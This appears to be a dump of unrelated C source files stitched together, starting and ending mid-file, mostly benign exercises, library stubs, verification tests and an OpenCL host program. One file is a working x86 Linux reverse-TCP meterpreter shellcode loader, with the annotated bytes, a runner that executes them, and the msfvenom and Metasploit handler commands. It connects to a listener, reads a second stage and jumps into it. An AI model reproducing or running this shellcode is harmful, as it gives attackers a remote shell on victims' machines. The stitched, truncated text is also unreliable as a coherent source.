aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", 4096); syscall(SYS_mkdir, (long)v12); v16 = syscall(SYS_open, (long)v13, 2, 0); syscall(SYS_write, (long)v16, (long)v0, 4096); syscall(SYS_sync); close(v16); syscall(SYS_link, (long)v13, (long)v14); v17 = syscall(SYS_open, (long)v15, 2, 0); syscall(SYS_fsync, (long)v17); close(v17); return 0; }
the_stack_data/33076.c
// SKIP PARAM: --set ana.activated[+] apron --set ana.path_sens[+] threadflag --sets exp.apron.privatization mutex-meet-tid-cluster12 extern int __VERIFIER_nondet_int(); #include <pthread.h> #include <assert.h> int g = 0; int h = 0; pthread_mutex_t A = PTHREAD_MUTEX_INITIALIZER; void *t_fun(void *arg) { pthread_mutex_lock(&A); g = 16; pthread_mutex_unlock(&A); return NULL; } void *t_fun2(void *arg) { pthread_mutex_lock(&A); h = __VERIFIER_nondet_int(); h = 12; pthread_mutex_unlock(&A); return NULL; } int main(void) { pthread_t id, id2; pthread_create(&id, NULL, t_fun, NULL); pthread_create(&id2, NULL, t_fun2, NULL); pthread_mutex_lock(&A); h = 31; pthread_mutex_unlock(&A); pthread_mutex_lock(&A); h = 12; pthread_mutex_unlock(&A); pthread_mutex_lock(&A); int z = h; assert(z != 31); pthread_mutex_unlock(&A); return 0; }
the_stack_data/57950994.c
#include <stdio.h> int main(){ int n1 = 41, n2 = 18; float f1, f2; void newVal(int, int, float *, float *); newVal(n1, n2, &f1, &f2); printf("sum = %f, remain = %f",f1,f2); return 0; } void newVal(int val1, int val2, float *sum, float *remain){ *sum = val1 + val2; *remain = val1 % val2; }
the_stack_data/34513785.c
/* Architecture : x86 OS : Linux Author : wetw0rk ID : SLAE-958 Shellcode Size : 97 bytes Connect Back Port : 12345 Description : This is a linux/x86/meterpreter/reverse_tcp shell. Created by analysing msfvenom; The original shellcode has 10 NULL bytes and comes in at 99 bytes. My shellcode is 97 and contains no NULLS once the IP is swapped. Of course to use this shellcode you need a metasploit handler although that should be assumed. I would like to note this is a staged payload thus you MUST have a handler setup. Original Metasploit Shellcode: sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=12345 -i 0 -f c PacketStorm Mirror: https://packetstormsecurity.com/files/143538/Linux-x86-TCP-Reverse-Shell.html Swap ip using: wetw0rk@x86:~$ python >>> a = '192.168.244.129'.split('.') >>> '{:02X}{:02X}{:02X}{:02X}'.format(*map(int, a)) Metasploit Handler Settings: use exploit/multi/handler set PAYLOAD linux/x86/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 12345 exploit Test using: gcc -fno-stack-protector -z execstack tshell.c Greets: offsec, abatchy (top llama), n4ss4r, dillage (top chinchilla), Hak5 Crew, rezkon, newbsec */ #include <stdio.h> #include <string.h> unsigned char code[]= \ // _start: // int socketcall(int call, unsigned long *args) "\xfc" // cld ; clear the direction flag (re-added for reliability) "\x31\xdb" // xor ebx,ebx ; zero out EBX "\xf7\xe3" // mul ebx ; zero out EAX "\x53" // push ebx ; int socket( "\x43" // inc ebx ; protocol = 0 = IPPROTO_IP "\x53" // push ebx ; type = 1 = SOCK_STREAM "\x6a\x02" // push 2 ; domain = 2 = AF_INET "\xb0\x66" // mov al,0x66 ; 0x66 aka syscall for socketcall() "\x89\xe1" // mov ecx,esp ; (ESP) top of stack contains our args "\xcd\x80" // int 80h ; call that kernel!!! // test for failure nice! (skape is an artist) "\x85\xc0" // test eax,eax ; set SF to 1 if eax < 0 "\x78\x48" // js exit ; jump to exit if SF == 1 "\x97" // xchg eax,edi ; place sockfd into EDI and 1 into EAX "\x5b" // pop ebx ; POP the top of stack into EBX (2) // int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen) "\x68\x7f\x00\x00\x01" // push dword 0x100007f ; PUSH "127.0.0.1" "\x66\x68\x30\x39" // push word 0x3930 ; PUSH "12345" (port) "\x66\x6a\x02" // push word 2 ; PUSH 2 aka AF_INET "\x89\xe1" // mov ecx,esp ; save the pointer to the struct "\x6a\x66" // push byte +0x66 ; PUSH 0x66 aka syscall for socketcall() "\x58" // pop eax ; POP it into EAX "\x50" // push eax ; PUSH EAX (syscall) onto the stack "\x51" // push ecx ; PUSH the struct pointer onto the stack "\x57" // push edi ; PUSH sockfd onto the stack "\x89\xe1" // mov ecx,esp ; MOV top of stack (args) into ECX "\x43" // inc ebx ; INC-rement EBX by 1 (EBX now = 3) aka SYS_CONNECT "\xcd\x80" // int 0x80 ; call that kernel!!! // test for failure (wicked) "\x85\xc0" // test eax,eax ; set SF to 1 if eax < 0 "\x78\x29" // js exit ; jump to exit if SF == 1 // int mprotect(void *addr, size_t len, int prot) "\xb2\x07" // mov dl,0x7 ; MOV 7 into DL "\x31\xc9" // xor ecx,ecx ; zero out the register "\x66\xb9\xff\x0f" // mov cx,0xfff ; MOV 0xfff into cx "\x41" // inc ecx ; 0x1000 or MAP_EXECUTABLE into ECX "\x89\xe3" // mov ebx,esp ; MOV ESP top of stack into EBX "\xc1\xeb\x0c" // shr ebx,byte 0xc ; SHR-ight EBX 12 times (EBX=0xbffff) "\xc1\xe3\x0c" // shl ebx,byte 0xc ; SHL-eft EBC 12 times (EBX=1) aka MCL_CURRENT "\xb0\x7d" // mov al,0x7d ; MOV 0x7d or syscall mprotect() into AL "\xcd\x80" // int 0x80 ; call the kernel! // test for failure (this is honestly sick) "\x85\xc0" // test eax,eax ; set SF to 1 if eax < 0 "\x78\x10" // js exit ; jump to exit if SF == 1 // read(int fd, void *buf, size_t count) "\x5b" // pop ebx ; POP 3 into EBX or our socket descriptor "\x89\xe1" // mov ecx,esp ; MOV ESP ("12345") into ECX (our port) "\x99" // cdq ; zero out EDX register "\xb6\x0c" // mov dh,0xc ; MOV 12 into DH "\xb0\x03" // mov al,0x3 ; syscall for read() "\xcd\x80" // int 0x80 ; call the kernel // test for failure nice ! (this is why it's so reliable) "\x85\xc0" // test eax,eax ; set SF to 1 if eax < 0 "\x78\x02" // js exit ; jump to exit if SF == 1 "\xff\xe1" // jmp ecx ; if al checks are good JMP to ECX (addr stored) // exit: "\xb0\x01" // mov al,0x1 ; syscall for exit() "\xb3\x01" // mov bl,0x1 ; error code 1 (avoids null) "\xcd\x80"; // int 0x80 ; call kernel and exit int main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); }
the_stack_data/635144.c
/* Copyright (C) 1998, 1999 Free Software Foundation, Inc. This file is part of the GNU C Library. Contributed by Phil Blundell, based on the Alpha version by David Mosberger. The GNU C Library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. The GNU C Library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with the GNU C Library; if not, see <http://www.gnu.org/licenses/>. */ #include <sys/io.h> #include <errno.h> #define MAX_PORT 0x10000 int iopl(int level) { if (level > 3) { __set_errno(EINVAL); return -1; } if (level) return ioperm(0, MAX_PORT, 1); return 0; }
the_stack_data/452450.c
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <CL/cl.h> unsigned char *read_buffer(char *file_name, size_t *size_ptr) { FILE *f; unsigned char *buf; size_t size; /* Open file */ f = fopen(file_name, "rb"); if (!f) return NULL; /* Obtain file size */ fseek(f, 0, SEEK_END); size = ftell(f); fseek(f, 0, SEEK_SET); /* Allocate and read buffer */ buf = malloc(size + 1); fread(buf, 1, size, f); buf[size] = '\0'; /* Return size of buffer */ if (size_ptr) *size_ptr = size; /* Return buffer */ return buf; } void write_buffer(char *file_name, const char *buffer, size_t buffer_size) { FILE *f; /* Open file */ f = fopen(file_name, "w+"); /* Write buffer */ if(buffer) fwrite(buffer, 1, buffer_size, f); /* Close file */ fclose(f); } int main(int argc, char const *argv[]) { /* Get platform */ cl_platform_id platform; cl_uint num_platforms; cl_int ret = clGetPlatformIDs(1, &platform, &num_platforms); if (ret != CL_SUCCESS) { printf("error: call to 'clGetPlatformIDs' failed\n"); exit(1); } printf("Number of platforms: %d\n", num_platforms); printf("platform=%p\n", platform); /* Get platform name */ char platform_name[100]; ret = clGetPlatformInfo(platform, CL_PLATFORM_NAME, sizeof(platform_name), platform_name, NULL); if (ret != CL_SUCCESS) { printf("error: call to 'clGetPlatformInfo' failed\n"); exit(1); } printf("platform.name='%s'\n\n", platform_name); /* Get device */ cl_device_id device; cl_uint num_devices; ret = clGetDeviceIDs(platform, CL_DEVICE_TYPE_GPU, 1, &device, &num_devices); if (ret != CL_SUCCESS) { printf("error: call to 'clGetDeviceIDs' failed\n"); exit(1); } printf("Number of devices: %d\n", num_devices); printf("device=%p\n", device); /* Get device name */ char device_name[100]; ret = clGetDeviceInfo(device, CL_DEVICE_NAME, sizeof(device_name), device_name, NULL); if (ret != CL_SUCCESS) { printf("error: call to 'clGetDeviceInfo' failed\n"); exit(1); } printf("device.name='%s'\n", device_name); printf("\n"); /* Create a Context Object */ cl_context context; context = clCreateContext(NULL, 1, &device, NULL, NULL, &ret); if (ret != CL_SUCCESS) { printf("error: call to 'clCreateContext' failed\n"); exit(1); } printf("context=%p\n", context); /* Create a Command Queue Object*/ cl_command_queue command_queue; command_queue = clCreateCommandQueue(context, device, 0, &ret); if (ret != CL_SUCCESS) { printf("error: call to 'clCreateCommandQueue' failed\n"); exit(1); } printf("command_queue=%p\n", command_queue); printf("\n"); /* Program source */ unsigned char *source_code; size_t source_length; /* Read program from 'lgamma_float4.cl' */ source_code = read_buffer("lgamma_float4.cl", &source_length); /* Create a program */ cl_program program; program = clCreateProgramWithSource(context, 1, (const char **)&source_code, &source_length, &ret); if (ret != CL_SUCCESS) { printf("error: call to 'clCreateProgramWithSource' failed\n"); exit(1); } printf("program=%p\n", program); /* Build program */ ret = clBuildProgram(program, 1, &device, NULL, NULL, NULL); if (ret != CL_SUCCESS ) { size_t size; char *log; /* Get log size */ clGetProgramBuildInfo(program, device, CL_PROGRAM_BUILD_LOG,0, NULL, &size); /* Allocate log and print */ log = malloc(size); clGetProgramBuildInfo(program, device, CL_PROGRAM_BUILD_LOG,size, log, NULL); printf("error: call to 'clBuildProgram' failed:\n%s\n", log); /* Free log and exit */ free(log); exit(1); } printf("program built\n"); printf("\n"); /* Create a Kernel Object */ cl_kernel kernel; kernel = clCreateKernel(program, "lgamma_float4", &ret); if (ret != CL_SUCCESS) { printf("error: call to 'clCreateKernel' failed\n"); exit(1); } /* Create and allocate host buffers */ size_t num_elem = 10; /* Create and init host side src buffer 0 */ cl_float4 *src_0_host_buffer; src_0_host_buffer = malloc(num_elem * sizeof(cl_float4)); for (int i = 0; i < num_elem; i++) src_0_host_buffer[i] = (cl_float4){{2.0, 2.0, 2.0, 2.0}}; /* Create and init device side src buffer 0 */ cl_mem src_0_device_buffer; src_0_device_buffer = clCreateBuffer(context, CL_MEM_READ_ONLY, num_elem * sizeof(cl_float4), NULL, &ret); if (ret != CL_SUCCESS) { printf("error: could not create source buffer\n"); exit(1); } ret = clEnqueueWriteBuffer(command_queue, src_0_device_buffer, CL_TRUE, 0, num_elem * sizeof(cl_float4), src_0_host_buffer, 0, NULL, NULL); if (ret != CL_SUCCESS) { printf("error: call to 'clEnqueueWriteBuffer' failed\n"); exit(1); } /* Create host dst buffer */ cl_float4 *dst_host_buffer; dst_host_buffer = malloc(num_elem * sizeof(cl_float4)); memset((void *)dst_host_buffer, 1, num_elem * sizeof(cl_float4)); /* Create device dst buffer */ cl_mem dst_device_buffer; dst_device_buffer = clCreateBuffer(context, CL_MEM_WRITE_ONLY, num_elem *sizeof(cl_float4), NULL, &ret); if (ret != CL_SUCCESS) { printf("error: could not create dst buffer\n"); exit(1); } /* Set kernel arguments */ ret = CL_SUCCESS; ret |= clSetKernelArg(kernel, 0, sizeof(cl_mem), &src_0_device_buffer); ret |= clSetKernelArg(kernel, 1, sizeof(cl_mem), &dst_device_buffer); if (ret != CL_SUCCESS) { printf("error: call to 'clSetKernelArg' failed\n"); exit(1); } /* Launch the kernel */ size_t global_work_size = num_elem; size_t local_work_size = num_elem; ret = clEnqueueNDRangeKernel(command_queue, kernel, 1, NULL, &global_work_size, &local_work_size, 0, NULL, NULL); if (ret != CL_SUCCESS) { printf("error: call to 'clEnqueueNDRangeKernel' failed\n"); exit(1); } /* Wait for it to finish */ clFinish(command_queue); /* Read results from GPU */ ret = clEnqueueReadBuffer(command_queue, dst_device_buffer, CL_TRUE,0, num_elem * sizeof(cl_float4), dst_host_buffer, 0, NULL, NULL); if (ret != CL_SUCCESS) { printf("error: call to 'clEnqueueReadBuffer' failed\n"); exit(1); } /* Dump dst buffer to file */ char dump_file[100]; sprintf((char *)&dump_file, "%s.result", argv[0]); write_buffer(dump_file, (const char *)dst_host_buffer, num_elem * sizeof(cl_float4)); printf("Result dumped to %s\n", dump_file); /* Free host dst buffer */ free(dst_host_buffer); /* Free device dst buffer */ ret = clReleaseMemObject(dst_device_buffer); if (ret != CL_SUCCESS) { printf("error: call to 'clReleaseMemObject' failed\n"); exit(1); } /* Free host side src buffer 0 */ free(src_0_host_buffer); /* Free device side src buffer 0 */ ret = clReleaseMemObject(src_0_device_buffer); if (ret != CL_SUCCESS) { printf("error: call to 'clReleaseMemObject' failed\n"); exit(1); } /* Release kernel */ ret = clReleaseKernel(kernel); if (ret != CL_SUCCESS) { printf("error: call to 'clReleaseKernel' failed\n"); exit(1); } /* Release program */ ret = clReleaseProgram(program); if (ret != CL_SUCCESS) { printf("error: call to 'clReleaseProgram' failed\n"); exit(1); } /* Release command queue */ ret = clReleaseCommandQueue(command_queue); if (ret != CL_SUCCESS) { printf("error: call to 'clReleaseCommandQueue' failed\n"); exit(1); } /* Release context */ ret = clReleaseContext(context); if (ret != CL_SUCCESS) { printf("error: call to 'clReleaseContext' failed\n"); exit(1); } return 0; }
the_stack_data/92327761.c
/* Functional tests for the function hotpatching feature. */ /* { dg-do compile } */ /* { dg-options "-O3 -mzarch -mhotpatch=0" } */ /* { dg-error "arguments to .-mhotpatch=n,m. should be non-negative integers" "" { target *-*-* } 0 } */
the_stack_data/83978.c
#include <stdio.h> #include <stdlib.h> #include <string.h> #define MAXBITS 64 int main(int argc, char *argv[]) { /* * Brady Lange * 3/6/18 * File name: hex_fourBits.c * This program coverts hexidecimal to binary and binary to hexidecimal */ // Start i at 2 because you don't count 0 and x for hexidecimal numbers int i = 2; // Used for array int k = 0; // Extracts the size of the binary number int origLength = strlen(argv[1]); //Creating an array to store the input in so it is easier to access char input[MAXBITS]; while(k != origLength) { input[k] = argv[1][k]; k++; } // Loop that converts a hexidecimal number into a binary number while(input[i] != '\0' && input[0] == '0' && input[1] == 'x') { switch(input[i]) { case '0': printf("0000"); break; case '1': printf("0001"); break; case '2': printf("0010"); break; case '3': printf("0011"); break; case '4': printf("0100"); break; case '5': printf("0101"); break; case '6': printf("0110"); break; case '7': printf("0111"); break; case '8': printf("1000"); break; case '9': printf("1001"); break; case 'A': printf("1010"); break; case 'B': printf("1011"); break; case 'C': printf("1100"); break; case 'D': printf("1101"); break; case 'E': printf("1110"); break; case 'F': printf("1111"); break; case 'a': printf("1010"); break; case 'b': printf("1011"); break; case 'c': printf("1100"); break; case 'd': printf("1101"); break; case 'e': printf("1110"); break; case 'f': printf("1111"); break; default: printf("Incorrect input. Must be a hexidecimal value: 0-9, a-f\n"); return 1; } i++; printf(" "); if(input[i] == '\0') printf("\n"); } // End of the while loop // Counters and flags int j = 0; int l = 0; // Counts the bits in the four bit max array int count = 0; // Array that stores only 4 bits so I can compare 4 at a time char fourBits[4]; /* //Creating an array to store the input in so it is easier to access char input[MAXBITS]; while(k != origLength) { input[k] = argv[1][k]; k++; } */ // Loop that coverts binary numbers into hexdecimal digits 4 binary numbers at a time while((input[j] == '0' || input[j] == '1') && (input[0] != '0' || input[1] != 'x')) { // If the length meets any of these mod conditions the length will increase and the array shifted if(origLength % 4 == 1) { origLength = origLength + 3; for(l = origLength - 1; l >= 0; l--) { if(l > 2) input[l] = input[l - 3]; //input[7] == input[4] else input[l] = '0'; } } else if(origLength % 4 == 2) { origLength = origLength + 2; for(l = origLength - 1; l >= 0; l--) { if(l > 1) input[l] = input[l - 2]; //input[6] == input[4] else input[l] = '0'; } } else if(origLength % 4 == 3) { origLength = origLength + 1; for(l = origLength - 1; l >= 0; l--) { if(l != 0) input[l] = input[l - 1]; //input[31] == input[30] else input[l] = '0'; } } // Loop that grabs only 4 bits at a time while(count < 4 && input[j] != '\0') { fourBits[count] = input[j]; j++; // Flag count++; } // Adding 0x to the hexidecimal number so represent what it is if(j == 4) printf("0x"); // Printing out hexidecimal numbers for four bits of binarys if(fourBits[0] == '0' && fourBits[1] == '0' && fourBits[2] == '0' && fourBits[3] == '0') printf("0"); else if(fourBits[0] == '0' && fourBits[1] == '0' && fourBits[2] == '0' && fourBits[3] == '1') printf("1"); else if(fourBits[0] == '0' && fourBits[1] == '0' && fourBits[2] == '1' && fourBits[3] == '0') printf("2"); else if(fourBits[0] == '0' && fourBits[1] == '0' && fourBits[2] == '1' && fourBits[3] == '1') printf("3"); else if(fourBits[0] == '0' && fourBits[1] == '1' && fourBits[2] == '0' && fourBits[3] == '0') printf("4"); else if(fourBits[0] == '0' && fourBits[1] == '1' && fourBits[2] == '0' && fourBits[3] == '1') printf("5"); else if(fourBits[0] == '0' && fourBits[1] == '1' && fourBits[2] == '1' && fourBits[3] == '0') printf("6"); else if(fourBits[0] == '0' && fourBits[1] == '1' && fourBits[2] == '1' && fourBits[3] == '1') printf("7"); else if(fourBits[0] == '1' && fourBits[1] == '0' && fourBits[2] == '0' && fourBits[3] == '0') printf("8"); else if(fourBits[0] == '1' && fourBits[1] == '0' && fourBits[2] == '0' && fourBits[3] == '1') printf("9"); else if(fourBits[0] == '1' && fourBits[1] == '0' && fourBits[2] == '1' && fourBits[3] == '0') printf("a"); else if(fourBits[0] == '1' && fourBits[1] == '0' && fourBits[2] == '1' && fourBits[3] == '1') printf("b"); else if(fourBits[0] == '1' && fourBits[1] == '1' && fourBits[2] == '0' && fourBits[3] == '0') printf("c"); else if(fourBits[0] == '1' && fourBits[1] == '1' && fourBits[2] == '0' && fourBits[3] == '1') printf("d"); else if(fourBits[0] == '1' && fourBits[1] == '1' && fourBits[2] == '1' && fourBits[3] == '0') printf("e"); else if(fourBits[0] == '1' && fourBits[1] == '1' && fourBits[2] == '1' && fourBits[3] == '1') printf("f"); else { printf("\nAn error has occured."); return 1; } // Adding this condition so that the printing looks neat if(j == origLength) printf("\n"); // Setting count to 0 so that only 4 values will be stored in fourBits array count = 0; // Exit while loop if the length of the array has been reached if(j == origLength) break; } if(j == 0 && input[0] != 0 && input[1] != 'x') { printf("You may only enter binary numbers: 1 or 0.\nIf you want to enter a hexidecimal in you must start with 0x.\n"); return 1; } return 0; } //End of the main method
the_stack_data/90763195.c
/* * Copyright (c) 2005 Apple Computer, Inc. All rights reserved. * * @APPLE_LICENSE_HEADER_START@ * * This file contains Original Code and/or Modifications of Original Code * as defined in and that are subject to the Apple Public Source License * Version 2.0 (the 'License'). You may not use this file except in * compliance with the License. Please obtain a copy of the License at * http://www.opensource.apple.com/apsl/ and read it before using this * file. * * The Original Code and all software distributed under the License are * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. * Please see the License for the specific language governing rights and * limitations under the License. * * @APPLE_LICENSE_HEADER_END@ */ #include <sys/cdefs.h> #if __DARWIN_UNIX03 #include <sys/types.h> #include <sys/time.h> #include <sys/resource.h> extern int __setrlimit(int resource, const struct rlimit *rlp); /* * setrlimit stub, for conformance, OR in _RLIMIT_POSIX_FLAG * * This is for UNIX03 only. */ int setrlimit(int resource, const struct rlimit *rlp) { resource |= _RLIMIT_POSIX_FLAG; return __setrlimit(resource, rlp); } #endif /* __DARWIN_UNIX03 */
the_stack_data/232954365.c
/* * CDDL HEADER START * * The contents of this file are subject to the terms of the * Common Development and Distribution License (the "License"). * You may not use this file except in compliance with the License. * * You can obtain a copy of the license at src/OPENSOLARIS.LICENSE * or http://www.opensolaris.org/os/licensing. * See the License for the specific language governing permissions * and limitations under the License. * * When distributing Covered Code, include this CDDL HEADER in each * file and include the License file at src/OPENSOLARIS.LICENSE. * If applicable, add the following below this CDDL HEADER, with the * fields enclosed by brackets "[]" replaced with your own identifying * information: Portions Copyright [yyyy] [name of copyright owner] * * CDDL HEADER END */ /* Translation table for iconv */ /* Copr (c) 1995,96 by Sun Microsystems, Inc. */ /* THIS FILE WAS AUTOMATICALLY GENERATED - PLEASE DO NOT EDIT BY HAND */ unsigned char __ib2_to_maz[256] = { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2A, 0x2B, 0x2C, 0x2D, 0x2E, 0x2F, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3A, 0x3B, 0x3C, 0x3D, 0x3E, 0x3F, 0x40, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x4F, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0x5B, 0x5C, 0x5D, 0x5E, 0x5F, 0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E, 0x6F, 0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7A, 0x7B, 0x7C, 0x7D, 0x7E, 0x7F, 0x80, 0x81, 0x82, 0x83, 0x84, 0x20, 0x8D, 0x87, 0x92, 0x89, 0x20, 0x20, 0x8C, 0xA0, 0x8E, 0x95, 0x20, 0x20, 0x20, 0x93, 0x94, 0x20, 0x20, 0x98, 0x9E, 0x99, 0x9A, 0x20, 0x20, 0x9C, 0x20, 0x20, 0x20, 0x20, 0xA2, 0x20, 0x8F, 0x86, 0x20, 0x20, 0x90, 0x91, 0xAA, 0xA6, 0x20, 0x20, 0xAE, 0xAF, 0xB0, 0xB1, 0xB2, 0xB3, 0xB4, 0x20, 0x20, 0x20, 0x20, 0xB9, 0xBA, 0xBB, 0xBC, 0xA1, 0xA7, 0xBF, 0xC0, 0xC1, 0xC2, 0xC3, 0xC4, 0xC5, 0x20, 0x20, 0xC8, 0xC9, 0xCA, 0xCB, 0xCC, 0xCD, 0xCE, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0xD9, 0xDA, 0xDB, 0xDC, 0x20, 0x20, 0xDF, 0xA3, 0xE1, 0x20, 0xA5, 0xA4, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0xF6, 0x20, 0xF8, 0x20, 0x20, 0x20, 0x20, 0x20, 0xFE, 0xFF };
the_stack_data/831457.c
// 7. 修改11.4节的maxmin.c程序, // 使得max_min函数使用指针而不是整数来跟踪数组中的当前位置。 /* Finds the largest and smallest elements in an array */ #include <stdio.h> #define N 10 void max_min(int a[], int n, int *max, int *min); int main(void) { int b[N], i, big, small; printf("Enter %d numbers: ", N); for (i = 0; i < N; i++) scanf("%d", &b[i]); max_min(b, N, &big, &small); printf("Largest: %d\n", big); printf("Smallest: %d\n", small); return 0; } void max_min(int a[], int n, int *max, int *min) { int *p; *max = *min = a[0]; for (p = a + 1; p < a + n; p++) { if (*p > *max) *max = *p; else if (*p < *min) *min = *p; } }
the_stack_data/107952901.c
typedef struct{ int * pi; } wt; void foo(wt * s) { *(s)->pi++ = 0; }
the_stack_data/162643703.c
#include <stdio.h> /* Enunciado: * * Elabore um programa que leia dois numeros flutuantes * e os imprima na ordem inversa que eles foram inseridos. * Utilize duas casas apos a virgula * * OBS: Leia os dois numeros na mesma linha * * Ex: * Digite dois numeros: 5 7 * 7.00 5.00 * */ int main (int argc, char *argv[]) { printf("Digite dois numeros: "); // Seu codigo a partir daqui return 0; }
the_stack_data/102045.c
/*- * Copyright (c) 1982, 1993 * The Regents of the University of California. All rights reserved. * * %sccs.include.redist.c% */ #ifndef lint static char sccsid[] = "@(#)EXP.c 8.1 (Berkeley) 06/06/93"; #endif /* not lint */ #include <math.h> extern int errno; double EXP(value) double value; { double result; errno = 0; result = exp(value); if (errno != 0) { ERROR("exp(%e) yields a result that is out of the range of reals\n", value); } return result; }
the_stack_data/125703.c
//Classification: #default/n/DAM/NP/aS/D(v)/fp/rp+cd //Written by: Sergey Pomelov //Reviewed by: Igor Eremeev //Comment: #include <stdio.h> int *func(int *p) { p = NULL; return p; }; int main(void) { int a = 1; int c; int i; scanf("%d",&c); for(i=1; i<100; i++) { if (c==i) a = *func(NULL); } printf("%d %d",a,c); return 0; }
the_stack_data/37638263.c
/* * Copyright (c) 2016-2018, Arm Limited and affiliates. * SPDX-License-Identifier: Apache-2.0 * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #ifdef MBED_CONF_RTOS_PRESENT #include "mbed_assert.h" #include "cmsis.h" #include "cmsis_os2.h" #include "mbed_rtos_storage.h" #include "ns_trace.h" #include "eventOS_scheduler.h" #include "ns_event_loop_mutex.h" #include "ns_event_loop.h" #define TRACE_GROUP "evlp" #if !MBED_CONF_NANOSTACK_HAL_EVENT_LOOP_USE_MBED_EVENTS #if MBED_CONF_NANOSTACK_HAL_EVENT_LOOP_DISPATCH_FROM_APPLICATION static mbed_rtos_storage_event_flags_t event_flag_cb; static const osEventFlagsAttr_t event_flags_attr = { .name = "nanostack_event_flags", .cb_mem = &event_flag_cb, .cb_size = sizeof event_flag_cb }; static osEventFlagsId_t event_flag_id; #else #ifndef MBED_TZ_DEFAULT_ACCESS #define MBED_TZ_DEFAULT_ACCESS 0 #endif static void event_loop_thread(void *arg); static uint64_t event_thread_stk[MBED_CONF_NANOSTACK_HAL_EVENT_LOOP_THREAD_STACK_SIZE / 8]; static mbed_rtos_storage_thread_t event_thread_tcb; static const osThreadAttr_t event_thread_attr = { .name = "nanostack_event_thread", .priority = osPriorityNormal, .stack_mem = &event_thread_stk[0], .stack_size = sizeof event_thread_stk, .cb_mem = &event_thread_tcb, .cb_size = sizeof event_thread_tcb, .tz_module = MBED_TZ_DEFAULT_ACCESS, }; #endif #if !MBED_CONF_NANOSTACK_HAL_EVENT_LOOP_DISPATCH_FROM_APPLICATION static osThreadId_t event_thread_id; #endif void eventOS_scheduler_signal(void) { // XXX why does signal set lock if called with irqs disabled? //__enable_irq(); //tr_debug("signal %p", (void*)event_thread_id); #if MBED_CONF_NANOSTACK_HAL_EVENT_LOOP_DISPATCH_FROM_APPLICATION osEventFlagsSet(event_flag_id, 1); #else osThreadFlagsSet(event_thread_id, 1); #endif //tr_debug("signalled %p", (void*)event_thread_id); } void eventOS_scheduler_idle(void) { //tr_debug("idle"); eventOS_scheduler_mutex_release(); #if MBED_CONF_NANOSTACK_HAL_EVENT_LOOP_DISPATCH_FROM_APPLICATION osEventFlagsWait(event_flag_id, 1, osFlagsWaitAny, osWaitForever); #else osThreadFlagsWait(1, 0, osWaitForever); #endif eventOS_scheduler_mutex_wait(); } #if !MBED_CONF_NANOSTACK_HAL_EVENT_LOOP_DISPATCH_FROM_APPLICATION static void event_loop_thread(void *arg) { (void)arg; eventOS_scheduler_mutex_wait(); eventOS_scheduler_run(); //Does not return } #endif // This is used to initialize the lock used by event loop even // if it is not ran in a separate thread. void ns_event_loop_init(void) { ns_event_loop_mutex_init(); // If a separate event loop thread is not used, the signaling // happens via event flags instead of thread flags. This allows one to // perform the initialization from any thread and removes need to know the id // of event loop dispatch thread. #if MBED_CONF_NANOSTACK_HAL_EVENT_LOOP_DISPATCH_FROM_APPLICATION event_flag_id = 